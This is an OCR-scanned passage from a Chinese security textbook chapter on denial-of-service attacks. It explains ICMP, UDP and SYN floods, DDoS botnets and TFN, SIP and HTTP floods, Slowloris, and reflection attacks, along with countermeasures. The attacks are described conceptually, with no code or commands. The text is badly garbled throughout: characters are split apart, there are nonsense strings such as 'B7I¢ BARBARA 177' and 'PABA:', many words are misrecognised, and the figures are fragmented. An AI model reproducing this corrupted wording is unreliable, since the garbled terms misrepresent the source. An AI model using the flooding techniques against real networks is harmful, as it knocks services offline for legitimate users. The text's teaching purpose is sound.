击 的 一 些 变种 。 这 些 攻 击 可 以 由 一 个 系统 或 多 个 系统 发 起 ， 采 用 我 们 下 面 将 要 研究 的 机 制 。 
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7.2 洪 泛 攻击 


根据 攻击 所 使 用 的 网 络 协议 不 同 ， 洪 泛 攻击 可 以 划分 为 不 同类 型 。 不 管 何 种 类 型 的 洪 泛 攻 
击 ， 其 目的 大 都 是 使 到 服务 器 的 链 路 超 负荷 。 洪 泛 攻击 的 目的 也 可 以 是 使 服务 器 处 理 和 响应 网 
络 流 量 的 能 力 超 负 荷 。 洪 泛 攻 击 利 用 大 量 的 恶意 数据 包 ( 相 比 于 合法 网 络 流量 是 压倒 性 的 ) 来 
充斥 服务 器 的 整个 网 络 连接 。 由 于 这 种 网 络 拥塞 ， 在 到 目标 服务 器 的 路 径 上 的 路 由 器 上 很 多 的 
数据 包 会 被 丢弃 。 合 法 的 流量 很 难 在 洪 泛 攻击 中 存活 下 来 ， 因 而 不 能 访问 服务 器 。 这 样 ARS 
器 对 网 络 连接 请 求 的 响应 能 力 急剧 下 降 ， 甚 至 完全 无 法 响应 。 

其 实 ， 几 乎 任何 类 型 的 网 络 数据 包 都 可 以 用 来 进行 洪 泛 攻击 。 只 要 数据 包 能 够 被 允许 流 过 
到 目标 系统 的 链 路 ， 那 么 它 就 可 以 消耗 到 目标 服务 器 的 某 个 链 路 上 的 所 有 可 用 流量 。 实 际 上 ， 
数据 包 越 大 ， 攻 击 的 效果 就 越 好 。 通 常 的 洪 泛 攻击 所 使 用 的 攻击 数据 包 类 型 有 : ICMP 数据 包 、 
UDP 数据 包 和 TCP SYN 数据 包 ， 其 至 可 使 用 其 他 的 下 数据 包 类 型 。 然 而 ,使 用 越 不 常用 的 
数据 包 ， 攻 击 效果 就 越 明 显 ， 也 就 越 容易 被 管理 员 过 滤 出 并 屏蔽 掉 。 


7.2.1 ICMP 洪 泛 


在 7.1 节 中 我 们 提 到 的 利用 ICMP 回 送 请 求 数据 包 的 ping 洪 泛 攻击 是 一 种 经 典 的 ICMP 
洪 泛 攻 击 。 由 于 ping 是 一 种 很 有 用 的 网 络 分 析 工 具 ， 网 络 管理 员 一 般 允 许 ICMP 回 送 请 求 
数据 包 进 入 他 们 的 网 络 ， 于 是 ICMP 回 送 请 求 数据 包 很 受 攻击 者 的 青睐 。 如 今 ， 很 多 的 组 织 
已 经 限制 了 这 种 类 型 数据 包 的 访问 并 将 之 隔离 于 防火 墙 之 外 。 作 为 回应 ， 攻 击 者 已 经 使 用 了 
其 他 类 型 的 ICMP 数据 包 。 由 于 其 中 某 些 数据 包 类 型 应 该 被 处 理 以 允许 TCP/IP 的 正确 运行 ， 
因而 其 很 可 能 被 允许 通过 组 织 的 防火 墙 。 如 果 过 滤 掉 某 些 关键 的 ICMP 数据 包 类 型 ， 就 有 可 
能 降低 或 破坏 正常 的 TCP/IP 网 络 行为 。ICMP 目的 不 可 达 和 超时 数据 包 都 是 这 种 关键 数据 包 
类 型 的 实例 。 

攻击 者 可 以 生成 大 量 的 某 种 类 型 的 数据 包 。 由 于 这 些 数据 包 中 包括 一 些 标记 为 错误 的 数据 
包 (用 于 支持 错误 报告 功能 )， 攻 击 者 可 以 发 出 大 量 这 种 数据 包 以 增加 在 链 路 上 洪 泛 的 效果 。 


7.2.2 UDP 洪 泛 


除了 使 用 ICMP 数据 包 攻击 之 外 ， 攻 击 者 还 可 以 利用 UDP 数据 包 进 行 攻击 。UDP 数据 包 
被 发 送 到 目标 系统 提供 服务 的 端口 上 。 攻 击 者 通常 会 将 UDP 数据 包 发 送 给 诊断 回 送 服务 ， 因 
为 该 服务 在 服务 器 系统 上 一 般 是 默认 运行 的 。 如 果 服 务 器 上 开启 了 这 项 服务 ， 那么 服务 器 就 会 
回应 一 个 带 有 初始 数据 内 容 的 UDP 数据 包 给 源 地 址 。 如 果 服 务 没有 开启 ， 则 这 个 来 自 攻击 者 
的 数据 包 将 会 被 丢弃 ， 并 且 可 能 会 回应 ICMP 目的 主机 不 可 达 数 据 包 给 发 送 者 。 其 实 ， 不 管 服 
务 器 上 有 没有 开启 这 个 服务 ， 攻 击 者 都 已 经 达到 了 消耗 服务 器 的 链 路 容量 的 目的 。 几 乎 任何 
UDP 端口 号 都 可 以 作为 目标 。 所 产生 的 响应 数据 包 只 是 加 重 了 服务 器 及 其 网 络 链 路 的 负载 。 

当 攻 击 者 利用 单一 系统 进行 UDP 洪 泛 攻击 时 ， 与 ICMP 洪 泛 攻击 一 样 ， 攻 击 者 一 般 会 使 
用 带 有 虚假 源 地 址 的 数据 包 。 当 攻击 者 使 用 多 个 系统 进行 UDP 洪 泛 攻击 时 ， 一 般 会 使 用 受 控 
的 僵尸 机 的 真实 地 址 作为 数据 包 源 地 址 。 当 使 用 多 系统 时 ， 数 据 包 反射 流 及 识别 攻击 者 的 能 力 
都 会 有 所 下 降 。 


7.2.3 TCP SYN 洪 泛 


另 一 种 洪 泛 攻 击 就 是 通过 发 送 TCP 数据 包 给 目标 系统 。 通 常 这 些 数据 包 都 是 带 有 真实 或 
虚假 源 地 址 的 正常 TCP 连接 请 求 ， 这 可 能 很 像 我 们 在 前 面 讲 到 的 SYN 欺骗 攻击 。 其 实在 SYN 
洪 泛 攻击 中 ， 攻 击 的 对 象 是 数据 包 的 总 量 而 不 是 目标 系统 上 的 网 络 处 理 程序 。 这 也 是 SYN IK 


B7I¢ BARBARA 177 


骗 攻 击 与 SYN 洪 泛 攻击 之 间 的 区 别 。 

SYN 洪 泛 攻击 也 使 用 TCP 数据 包 ， 这 些 数据 包 由 于 不 属于 任何 已 知 连接 而 被 服务 器 拒 
绝 。 但 是 这 时 ， 攻 击 者 已 经 成 功 地 攻击 了 服务 器 的 网 络 链 路 。 

如 果 攻 击 者 采用 单一 主机 攻击 ， 这 种 洪 泛 攻击 的 任何 变种 的 攻击 效果 会 受 攻击 系统 上 所 能 
产生 的 网 络 流量 总 量 的 限制 。 而 且 单一 的 攻击 系统 也 会 使 得 攻击 者 更 容易 被 跟踪 。 由 于 这 些 原 
因 ， 一 个 复杂 的 多 攻击 系统 SYN 洪 泛 攻击 衍生 出 来 。 通 过 使 用 多 个 主机 ， 攻 击 者 可 以 显著 地 
增加 攻击 中 的 数据 包 数 量 ， 而 且 多 个 主机 中 的 任何 一 台 系 统 都 不 需要 有 很 高 的 性 能 或 者 处 于 很 
高 容量 的 链 路 。 它 们 不 是 单独 地 行动 ， 而 是 相互 协调 补偿 的 。 攻 击 者 可 以 通过 间接 地 控制 各 个 
僵尸 机 而 发 起 攻击 ， 而 攻击 者 则 在 一 个 很 遥远 的 地 方 ， 难 以 被 追踪 和 识别 。 使 用 多 机 系统 的 间 
接 攻 击 包括 : 

e 分 布 式 拒绝 服务 攻击 (DDoS) 

e 反射 攻击 (reflector attack) 

o 放大 攻击 (amplifier attack) 

接 下 来 我 们 将 依次 讨论 这 些 攻 击 。 


7.3 分 布 式 拒绝 服务 攻击 


认识 到 单机 洪 泛 攻击 的 局 限 性 并 引入 多 机 系统 进行 攻击 ， 是 DoS 攻击 工具 的 一 个 早期 
的 重要 发 展 。 典 型 的 多 机 系统 都 是 受 控 的 用 户 工 作 站 或 者 PC 机 。 攻 击 者 通过 操作 系统 上 或 
者 某 些 常用 应 用 程序 的 一 些 熟 知 的 漏洞 来 获得 访问 这 些 系 统 的 权限 ， 并 在 上 面 安装 自己 的 程 
序 。 这 些 被 人 侵 的 主机 系统 就 是 所 谓 的 僵尸 机 ( zombie)。 一 旦 僵尸 机 被 安装 上 合适 的 后 门 程 
序 ， 就 会 完全 处 在 攻击 者 的 控制 之 下 。 攻 击 者 控制 的 大 量 僵尸 机 组 合 在 一 起 就 形成 一 个 僵尸 
网 络 (botnet)， 这 我 们 已 在 第 7 章 讨论 过 。 这 种 由 众多 僵尸 机 形成 的 僵尸 网 络 往往 是 攻击 者 所 
青睐 的 ， 可 以 用 它们 达到 各 种 各 样 的 目的 ， 包 括 分 布 式 拒 绝 服务 (Distribute Denial-of-Service, 
DDoS) 攻击 。 如 图 7-1 所 示 ， 某 些 宽带 用 户 系统 被 攻击 者 控制 ， 并 作为 僵尸 机 对 企业 或 其 他 
网 络 链 路 发 起 攻击 。 

虽然 攻击 者 可 以 独立 地 对 每 个 僵尸 机 进行 直接 控制 ， 但 攻击 者 更 多 采用 等 级 方式 控制 僵尸 
机 。 其 中 少量 的 系统 充当 执行 者 (handler)， 负 责 控制 大 量 的 其 他 代理 系统 ， 如 图 7-4 所 示 。 这 
种 等 级 控制 方式 有 着 诸多 优点 。 攻 击 者 可 以 通过 发 送 一 条 单一 的 命令 给 执行 者 ， 然 后 执行 者 就 
会 自动 地 将 其 通知 给 所 有 在 其 控制 之 下 的 代理 系统 。 正 如 在 第 6 章 中 讲 到 的 那样 ， 自 动感 染 工 
具 会 扫描 并 控制 合适 的 僵尸 机 。 一 旦 代理 软件 被 上 载 到 一 个 刚刚 被 控制 的 系统 ， 那 么 这 个 受 控 
系统 就 会 联系 一 个 或 多 个 执行 者 ， 并 将 该 系统 的 可 用 性 自动 地 通知 给 它们 。 通 过 这 种 方式 ， 攻 
击 者 可 以 自动 扩大 其 所 控制 的 僵尸 网 络 。 

一 个 最 早 的 、 著 名 的 DDoS 攻击 工具 是 部 落 洪 泛 网 络 (Tribe Flood Network，TFN)， 它 是 
由 黑客 Mixter 编写 的 。 它 最 初 在 20 世纪 90 年 代 是 基于 Sun Solaris 操作 系统 被 开发 的 。 后 来 
被 重 写 为 部 落 洪 泛 网 络 2000 (TFN2K)， 可 以 运行 在 UNIX Solaris 和 Windows NT 操作 系统 上 。 
TEN 和 TFN2K 使 用 两 层 的 等 级 控制 模式 ， 如 图 7-4 所 示 。 代 理 系统 就 是 一 个 木马 程序 ， 这 个 
木马 程序 可 以 在 受 控 的 僵尸 系统 上 进行 自我 复制 和 运行 ， 而 且 可 以 进行 ICMP 洪 泛 攻击 、SYN 
洪 泛 攻击 、UDP 洪 泛 攻击 以 及 ICMP 放大 攻击 等 形式 的 DoS 攻击 。TFN 攻击 数据 包 并 不 使 用 
虚假 源 地 址 ， 而 是 利用 大 量 的 受 控 系 统 和 特殊 等 级 结构 来 变相 地 掩盖 返回 到 攻击 者 的 路 径 。 代 
理 系 统 同 样 可 以 执行 一 些 rootkit 功能 ， 见 第 6 章 。 执 行者 则 是 简单 的 命令 行程 序 ， 运 行 在 受 
控 系统 上 。 攻 击 者 利用 适当 的 机 制 获 得 僵尸 机 上 的 shell 访问 权限 ， 然 后 运行 带 有 期 望 选项 的 
执行 者 程序 。 每 一 个 执行 者 都 可 以 控制 大 量 的 代理 系统 ， 并 用 提供 的 列表 进行 标识 。 执 行者 与 
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代理 系统 之 间 的 通信 和 是 经 过 加 密 的 ， 而 且 会 伴随 着 一 些 诱骗 数据 包 来 迷惑 网 络 管理 员 ， 防 止 被 
监控 或 进行 控制 流量 分 析 。 而 且 它 们 之 间 的 通信 以 及 攻击 本 身 可 以 通过 随机 化 的 TCP、UDP 
和 ICMP 数据 包 来 发 送 。TFN 攻击 工具 说 明了 DDoS 攻击 系统 的 典型 功能 。 





图 7-4 DDoS 攻击 体系 结构 


目前 ， 很 多 其 他 类 型 的 DDoS 攻击 工具 已 经 出 现 。 这 些 DDoS 攻击 工具 更 多 的 是 使 用 
IRC 6 或 者 其 他 类 似 的 即时 消息 服务 器 程序 来 管理 与 代理 系统 之 间 的 通信 ， 以 取代 专用 的 执行 
者 程序 。 为 了 防止 命令 流量 的 分 析 ， 如 今 很 多 的 DDoS 攻击 工具 还 采用 加 密 机 制 来 验证 代理 系 
统 的 身份 。 

为 了 防止 自己 成 为 DDoS 攻击 中 的 不 知情 参与 者 ， 最 好 的 措施 是 不 让 自己 的 系统 被 攻击 者 
控制 。 这 就 要 求 我 们 有 良好 的 系统 安全 操作 规范 ， 及 时 打 补 丁 ， 升 级 操作 系统 和 应 用 程序 到 最 
新 版 本 。 . 

对 于 DDoS 攻击 的 目标 来 讲 ， 其 对 攻击 的 应 对 与 对 任何 的 洪 泛 攻击 的 应 对 一 样 ， 只 是 应 对 
更 多 、 更 复杂 。 在 7.5 节 和 7.6 节 中 我 们 会 讲述 一 些 常用 的 防御 和 应 对 措施 。 


74 基于 应 用 的 带宽 攻击 


拒绝 服务 的 一 个 可 能 的 有 效 策 略 是 强制 目标 进行 资源 消耗 操作 ， 这 些 操作 消耗 的 资源 与 攻 
击 付出 的 代价 不 成 比例 ， 攻 击 效果 出 乎 意料 。 例 如 , Web 站 点 可 能 会 由 于 响应 一 个 简单 的 请 求 ， 
长 时 间 忙 于 诸如 搜索 之 类 的 操作 。 基 于 应 用 的 带宽 攻击 ， 是 试图 利用 服务 器 上 不 成 比例 的 大 量 
资源 开销 而 进行 的 。 本 节 ， 我 们 将 讨论 两 种 可 以 用 来 进行 此 类 攻击 的 协议 。 


7.4.1 SIP 洪 泛 


IP 电话 ( Voice over IP, VoIP) 技术 已 在 Intemet 上 广泛 应 用 。JP 电话 建立 呼叫 使 用 的 标准 
协议 是 会 话 发 起 协议 〈 Session Initiation Protocol, SIP), SIP 是 一 个 基于 文本 的 协议 ,语法 与 
HTTP 协议 类 似 。SIP 消息 有 两 种 不 同形 式 : 请 求 和 响应 。 图 7-5 是 对 SIP INVITE 消息 的 操作 
的 一 个 简要 阐述 ，INVITE 消息 用 来 在 客户 代理 间 建 立 一 个 媒体 会 话 。 在 这 个 例子 中 ，Alice 的 


© Internet 中 继 聊天 (Internet Relay Chat, IRC) 是 最 早 开发 的 即时 通信 系统 之 一 ， 其 具有 大 量 的 开源 服务 器 实 
现 。 它 经 常 被 攻击 者 使 用 ， 将 其 修改 之 后 作为 控制 大 量 代理 的 执行 者 程序 。 利 用 标准 聊天 机 制 ， 攻 击 者 可 
以 通过 中 继 将 消息 发 送 给 连接 到 服务 器 该 通道 的 所 有 代理 。 另 外 一 种 方法 是 将 消息 直接 发 送 给 一 个 代理 或 
一 个 已 定义 的 代理 组 。 
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客户 代理 运行 在 一 台 计 算 机 上 ，Bob 的 代理 运行 在 一 台 蜂 窝 电 话 上 。Alice 的 客户 代理 被 设置 
与 一 台 代 理 服务 器 (外 呼 服务 ) 通信 ， 开 始 向 代理 服务 器 发 送 一 个 INVITE SIP 请 求 ， 目 的 是 
邀请 Bob 的 客户 代理 加 入 会 话 。 代 理 服务 器 通过 DNS 服务 器 查找 到 Bob 使 用 的 代理 服务 器 的 
地 址 ， 然 后 将 INVITE 请 求 转发 至 Bob 的 代理 服务 器 。 服 务 器 将 消息 继续 转发 至 Bob 的 客户 
端 ， 于 是 Bob 的 手机 响 了 9S。 

SIP 洪 泛 攻击 利用 的 是 单个 INVITE 请 求 造成 的 相当 大 的 资源 开销 。 攻 击 者 利用 伪造 的 IP 
地 址 向 一 个 SIP 代理 洪 泛 大 量 的 INVITE 请 求 ， 或 者 利用 一 个 僵尸 网 络 生成 大 量 的 INVITE 请 
求 进行 DDoS 攻击 。 此 类 攻击 以 两 种 方式 对 SIP 代理 服务 器 造成 负载 。 首 先 ， 服 务 器 的 资源 被 
INVITE 请 求 消 耗 。 第 二 ， 服 务 器 的 网 络 容量 被 消耗 。 被 呼叫 的 用 户 也 是 此 类 攻击 的 受害 者 。 
目标 系统 被 大 量 伪造 的 P 电话 请 求 洪 泛 攻击 ， 导 致 系统 无 法 响应 合法 的 请 求 。 


DNS 服务 器 






INVITE sip:bob@biloxi.coh 
INVITE sip:bob@biloxi.com rom: sip:alice@atlanta cq 
From: sip:alice@atlanta.com 





7-5 SIP INVITE 场景 


7.4.2 基于 HTTP 的 攻击 


我 们 考虑 利用 两 种 不 同 的 手段 攻击 HTTP 协议 来 达到 拒绝 服务 的 目的 。 

HTTP 洪 泛 攻 击 HTTP 洪 泛 攻击 指 的 是 利用 HTTP 请 求 攻击 Web 服务 器 。 通 常 意义 上 ， 
这 是 一 种 DDoS 攻击 ，HTTP 请 求 来 自 许多 不 同 的 bots。 这 些 请 求 可 以 用 于 消耗 相当 大 的 资源 。 
例如 ， 从 目标 处 下 载 一 个 大 文件 的 HTTP 请 求 会 令 Web 服务 器 从 硬盘 中 读 取 文件 ， 然 后 将 其 
存储 在 内 存 中 ， 再 将 其 转换 为 一 个 网 络 包 流 ， 再 传输 这 些 网 络 包 。 这 一 过 程 消耗 了 内 存 、 处 理 
和 传输 资源 。 

此 类 攻击 的 一 个 变种 类 型 被 称 为 递归 HTTP 洪 泛 。 在 这 个 例子 中 ，bots 从 给 定 的 HTTP 链 
接 出 发 ， 通 过 递归 方式 遍历 给 定 的 Web 服务 器 的 所 有 链接 。 这 也 被 称 为 息 虫 。 

Slowloris ”基于 HTTP 攻击 的 一 种 有 意思 和 非 正常 的 形式 被 称 为 Slowloris [SOUR12], 


© 文献 [STAL11a] 中 有 对 SIP 操作 的 更 详细 的 讲述 。 
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[DAMO12]. Slowloris 利用 多 线程 支持 多 个 到 同一 服务 器 应 用 程序 的 请 求 技术 进行 攻击 ， 这 是 
通用 的 服务 器 技术 。 它 通过 向 Web 服务 器 不 停 地 发 送 不 完整 的 HTTP 请 求 ， 试 图 独占 所 有 可 
用 的 请 求 处 理 线程 。 由 于 每 个 请 求 都 需要 消耗 一 个 线程 ， 所 以 Slowloris 攻击 最 终 能 耗 尽 所 有 
Web 服务 器 的 连接 能 力 ， 从 而 有 效 地 拒绝 合法 用 户 的 访问 请 求 。 

HTTP 协议 规范 (RFC 2616 ) PABA: 一 个 空白 行 必须 用 来 说 明 请 求 报头 的 末尾 或 载荷 开始 ， 
如 果 有 的 话 。 一 旦 接收 到 完整 的 请 求 ，Web 服务 器 便 会 响应 。Slowloris 攻击 通过 建立 多 个 到 
Web 服务 器 的 连接 来 实施 。 在 每 个 连接 中 ， 发 送 一 个 不 完整 的 请 求 ， 请 求 中 不 包含 终止 换行 
序列 。 攻 击 者 周期 性 地 发 送 额 外 的 报头 行 来 维持 连接 不 被 中 断 ， 但 是 从 不 发 送 终止 换行 序列 。 
Web 服务 器 会 保持 该 连接 处 于 打开 状态 ， 期 待 收 到 更 多 的 信息 完成 这 个 请 求 。 随 着 攻击 的 持续 
进行 ， 需 长 时 间 维 持 的 Slowloris 连接 的 规模 也 会 增加 ， 最 后 消耗 掉 Web 服务 器 所 有 可 用 的 连 
接 ， 因 此 致使 Web 服务 器 没有 响应 合法 请 求 的 能 力 。 

Slowloris 与 典型 拒绝 服务 攻击 不 同 之 处 在 于 ，Slowloris 利用 合法 的 HTTP 流量 ， 不 依赖 
于 能 攻击 特殊 HTTP 服务 器 中 bug 的 特殊 的 “ 坏 的 ”HTTP 请 求 。 因 此 ， 现 有 依赖 特征 检测 的 
人 侵 检 测 和 入 侵 防护 手段 无 法 识别 出 Slowloris。 这 意味 着 即使 部 署 有 企业 级 的 入 侵 检测 系统 和 
人 侵 防 护 系统 ，Slowloris 依然 能 有 效 地 发 起 攻击 。 

现在 有 很 多 对 抗 Slowloris 攻击 的 措施 ， 包 括 限制 特殊 主机 接 人 的 比例 ， 对 每 个 连接 设置 
超时 机 制 和 延迟 绑 定 。 延 迟 绑 定 由 负载 均衡 软件 实现 。 本 质 上 讲 ， 负 载 均衡 会 对 HTTP 请 求 报 
头 做 完整 性 检查 ， 这 意味 着 除非 HTTP 客户 端 发 送 报 头 的 最 后 两 个 回 车 和 换行 ， 否 则 该 请 求 是 
不 会 被 送 至 Web 服务 器 的 。 这 是 信息 中 的 关键 比特 。 从 根本 上 说 ， 延 迟 绑 定 确 保 了 Web 服务 
器 或 代理 不 会 看 到 Slowloris 发 送 来 的 不 完整 的 请 求 。 


7.5 反射 攻击 与 放大 攻击 


在 DDoS 攻击 中 ， 中 间 媒 介 是 运行 攻击 者 程序 的 受 控 系 统 。 与 DDoS 攻击 不 同 ， 反 射 攻 
击 和 放大 攻击 通常 利用 的 是 网 络 服务 系统 的 正常 功能 。 攻 击 者 发 送 带 有 虚假 源 地 址 的 数据 包 给 
某 些 网 络 服务 系统 上 的 服务 。 网 络 服务 器 为 了 响应 这 些 数据 包 ， 会 发 送 一 个 响应 包 给 攻击 包 所 
指向 的 源 地 址 ， 而 这 个 地 址 正 是 攻击 者 想 要 攻击 的 目标 系统 。 如 果 攻 击 者 发 送 一 定数 量 的 拥有 
同样 源 地 址 的 请 求 包 给 一 定数 量 的 提供 同样 服务 的 服务 器 ， 那么 这 些 服务 所 产生 的 响应 数据 
包 几 乎 会 全 部 占据 目标 系统 的 网 络 链 路 。 这 些 服务 器 系统 实际 上 成 为 DDoS 攻击 的 中 间 媒 介 
( intermediary)， 而 且 它 们 对 数据 包 的 处 理 看 上 去 也 是 正常 的 。 这 也 就 意味 着 攻击 者 可 以 更 加 
容易 地 进行 攻击 并 可 躲避 跟踪 。 这 种 攻击 有 两 种 基本 的 变种 : 简单 反射 攻击 (simple reflection 
attack) 和 放大 攻击 (amplification attack), 


7.5.1 反射 攻击 


反射 攻击 是 这 种 攻击 的 一 种 直接 实现 。 攻 击 者 将 其 想 攻击 的 目标 系统 地 址 作为 数据 包 的 源 
地 址 ， 并 将 这 些 数据 包 发 送 给 中 间 媒 介 上 的 已 知 网 络 服务 。 当 中 间 媒 介 响 应 时 ， 大 量 的 响应 数 
据 包 会 被 发 送 给 源 地 址 所 指向 的 目标 系统 。 它 能 有 效 地 使 攻击 从 中 间 媒 介 反射 出 去 〈 称 为 反射 
器 )， 这 也 就 是 这 种 攻击 被 称 为 反射 攻击 的 原因 。 

攻击 者 希望 他 们 所 利用 的 网 络 服务 是 一 个 用 较 小 请 求 就 可 以 产生 较 大 响应 数据 包 的 服务 。 
这 样 ， 攻 击 者 就 可 以 利用 来 自 攻击 系统 的 小 流量 请 求 数据 包 在 中 间 媒 介 上 产生 大 流量 的 响应 数 
据 包 到 目标 系统 。 通 常 UDP 服务 可 以 达到 这 种 目的 。 尽 管 回 送 请 求 服务 不 能 够 产生 较 大 的 
响应 数据 包 ， 但 在 早期 其 仍 是 攻击 者 的 首选 。 任 何 常用 的 UDP 服务 都 可 以 用 来 进行 这 种 攻 
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iio chargen, DNS, SNMP 3È ISAKMP 9 服务 都 可 以 产生 大 量 响 应 数据 包 而 曾 被 用 来 进行 反射 
攻击 。 

作为 反射 攻击 的 中 间 系 统 往往 是 拥有 较 高 系统 性 能 的 网 络 服 务 器 或 者 具有 良好 网 络 连 接 
性 能 的 路 由 器 。 这 就 意味 着 ， 攻 击 者 可 以 通过 中 间 系 统 (根据 实际 情况 的 需要 ) 形成 很 高 的 网 
络 通信 流量 。 即 使 不 能 够 形成 很 高 的 网 络 通信 流量 ， 这 些 流量 也 可 以 占用 目标 系统 的 部 分 网 络 
带宽 。 如 果 攻 击 者 循环 地 利用 多 个 中 间 媒 介 发 起 攻击 ， 那 么 网 络 管理 员 很 难 将 这 种 攻击 流量 从 
其 他 的 正常 通信 流量 中 区 别 开 来 。 这 样 ， 加 上 虚假 源 地 址 的 使 用 ， 更 是 加 大 了 追踪 攻击 者 的 
难度 。 

另 一 种 类 型 的 反射 攻击 利用 TCP SYN 数据 包 和 建立 TCP 连接 的 三 次 握手 进行 攻击 。 攻 击 
者 发 送 一 些 带 有 虚假 源 地 址 的 SYN 数据 包 给 选 定 的 中 间 媒 介 。 作 为 回应 ， 中 间 媒 介 会 回应 一 
A SYN-ACK 数据 包 给 这 个 数据 包 中 的 源 地 址 所 指向 的 主机 ， 这 是 真正 的 目标 系统 。 攻 击 者 利 
用 一 定数 量 的 中 间 媒 介 来 形成 大 量 的 SYN-ACK 数据 包 。 这 种 攻击 的 目的 就 是 在 目标 系统 的 网 
络 上 形成 足够 大 流量 的 数据 包 ， 洪 泛 攻 击 目标 系统 的 网 络 链 路 。 目 标 系统 接收 到 SYN-ACK 数 
据 包 后 ， 由 于 本 机 根本 没有 提出 TCP 请 求 ， 因 此 对 于 每 个 SYN-ACK 数据 包 会 返回 一 个 RST 
包 。 此 时 ， 攻 击 者 已 经 达到 了 淹没 目标 系统 的 网 络 链 路 的 目的 。 

利用 SYN-ACK 的 反射 攻击 不 同 于 本 章 前 面 所 讲 的 SYN 欺骗 攻击 。 这 种 攻击 的 目的 就 是 
洪 泛 目标 系统 的 网 络 带宽 ， 而 不 是 耗 尽 目标 系统 的 网 络 处 理 资源 。 当 然 ， 因 为 需要 降低 攻击 行 
为 被 发 现 的 概率 ， 攻 击 者 关心 发 送 给 中 间 媒 介 的 通信 流量 大 小 ， 确 保 通 信 流 量 不 能 太 大 而 被 网 
络 管理 员 所 察觉 。 这 是 因为 持续 发 挥 作用 是 这 种 攻击 的 一 个 重要 项 ， 而 且 这 也 降低 了 攻击 行 
为 被 检测 到 的 概率 。 在 2002 年 ，GRC.com 曾 受 到 这 种 类 型 的 攻击 。 攻 击 者 将 核心 路 由 器 作为 
主要 的 中 间 媒 介 ， 并 发 送 连 接 请 求 给 运行 在 核心 路 由 器 上 的 BGP 路 由 服务 。 所 产生 的 大 量 响 
应 数据 包 涌 向 GRC.com， 面 对 洪水 般 的 响应 数据 包 ，GRC.com 网 络 服务 完全 瘫痪 。 然 而 ， 据 
GRC.com 所 发 现 的 ， 屏 项 了 这 类 流量 后 ， 很 多 其 他 中 间 媒 介 上 的 其 他 类 型 的 服务 也 被 利用 了 。 
GRC 在 有 关 这 类 攻击 的 报告 中 称 :“ 当 数据 包 疯 狂 地 涌 向 你 的 时 候 ， 你 知道 你 遇 到 麻烦 了 。” 

任何 常用 的 TCP 服务 都 可 以 被 用 来 进行 这 类 反射 攻击 。 我 们 都 知道 Internet 上 存在 着 大 量 
的 可 用 服务 器 ， 包 括 很 多 具有 很 高 容量 的 网 络 链 路 ， 也 就 是 说 存在 大 量 的 可 用 中 间 媒 介 。 由 
于 单个 的 TCP 连接 请 求 攻击 很 难 从 正常 的 TCP 连接 请 求 中 被 区 分 出 来 ， 使 得 这 类 攻击 更 加 有 
效 。 如 果 在 中 间 媒 介 上 安装 某 些 形式 的 人 侵 检测 系统 就 好 了 ， 这 样 在 发 现 大 量 的 来 自 同一 个 地 
址 的 失败 连接 消息 后 ， 中 间 媒 介 就 可 以 迅速 地 察觉 到 这 种 攻击 并 屏蔽 掉 该 类 数据 包 。 如 果 攻 击 
者 利用 多 个 中 间 媒 介 ， 即 使 其 中 一 些 中 间 媒 介 检 测 到 了 这 种 攻击 并 屏蔽 了 此 类 流量 ， 但 攻击 者 
还 有 其 他 的 中 间 媒 介 ， 因 而 虽然 攻击 的 效果 会 稍 差 ， 但 攻击 还 是 可 以 达到 一 定 的 预期 效果 的 。 

另 一 种 改进 型 的 反射 攻击 在 中 间 媒 介 和 目标 系统 之 间 建 立 了 一 条 自 包 含 的 回路 。 两 个 系 
统 都 被 当 作 反射 器 。 图 7-6 描述 了 此 类 攻击 。 图 中 上 半 部 分 描述 了 通常 的 DNS 操作 8。DNS 
的 客户 端 从 它 的 端口 1792 利用 UDP 协议 向 DNS 的 端口 53 发 送 查询 请 求 来 获取 一 个 域名 的 
IP 地 址 。DNS 服务 器 会 发 送 一 个 包含 IP 地址 的 响应 包 。 图 中 下 半 部 分 展示 了 利用 DNS H 
行 的 反射 攻击 。 攻 击 者 利用 一 个 虚假 的 源 地 址 j.k.l.m 向 DNS 服务 器 发 送 查 询 请 求 。 攻 击 者 


O 字符 发 生 器 协议 是 字符 发 生 器 诊断 服务 ， 它 会 向 连接 到 服务 器 的 客户 端 返回 一 个 字符 流 。 域 名 服务 
(Domain Name Service, DNS) 是 用 来 对 域名 和 了 下 地 址 进行 相互 翻译 的 。 简 单 网 络 管理 协议 ( Simple 
Network Mangement Protocol, SNMP) 是 通过 发 送 询 问 获 得 响应 ， 来 管理 网 络 设备 的 协议 。 互 联网 安全 关联 
和 密 钥 管理 协议 (Internet Security Association and Key Management Protocol, ISAKMP) 在 互联 网 协议 安全 性 
(Internet Protocol, Security Architecture, IPsec) 中 提供 了 密 钥 管理 框架 ， 我 们 在 第 22 章 进行 这 方面 的 讨论 。 

© DNS 的 综述 见 附录 I。 
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使 用 端口 7， 该 端口 通常 是 应 答 协 议 (echo)s 使 用 的 端口 。DNS 服务 器 稍 后 会 向 该 攻击 的 受 
害 者 ， 也 就 是 j.k.Lm 的 端口 7 发 送 一 个 响应 。 如 果 受 害 者 的 机 器 提供 应 答 协 议 服务 ， 它 可 
能 会 创建 一 个 网 络 包 将 接收 到 的 数据 返回 给 DNS 服务 器 。 如 果 DNS 服务 器 响应 了 受害 者 的 
机 器 发 送 的 这 个 网 络 包 ， 那 么 会 在 DNS 服务 器 和 受害 者 的 机 器 之 间 形 成 死 循环 。 基 于 网 络 
和 基于 主机 的 防火 墙 将 规则 设置 为 拒绝 这 类 可 疑 端口 交换 信息 ， 便 可 阻止 绝 大 多 数 的 反射 
攻击 。 
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图 7-6 DNS 反射 攻击 


这 种 攻击 相当 有 效 ， 但 很 容易 被 过 滤 掉 ， 因 为 在 正常 的 网 络 通信 操作 中 不 会 使 用 这 类 服务 
端口 。 

当 进 行 任意 类 型 的 反射 攻击 时 ， 攻 击 者 仅仅 需要 一 个 系统 作为 构造 最 初 的 数据 包 的 源 。 这 
是 足够 的 ， 特 别 是 当 服务 所 产生 的 响应 数据 包 大 大 超过 攻击 者 开始 发 送 给 中 间 媒 介 的 数据 包 的 
数量 时 。 对 于 利用 多 机 系统 的 攻击 ， 多 个 系统 可 以 发 送 更 多 的 攻击 数据 包 给 中 间 媒 介 ， 这 样 可 
以 更 好 地 隐藏 攻击 者 ， 躲 避 跟 踪 。 一 般 攻 击 者 会 选择 僵尸 网 络 。 

反射 攻击 的 另 一 个 特性 是 它 没有 反 向 散射 流量 。 在 直接 洪 泛 攻 击 和 SYN 欺骗 攻击 中 ， 由 
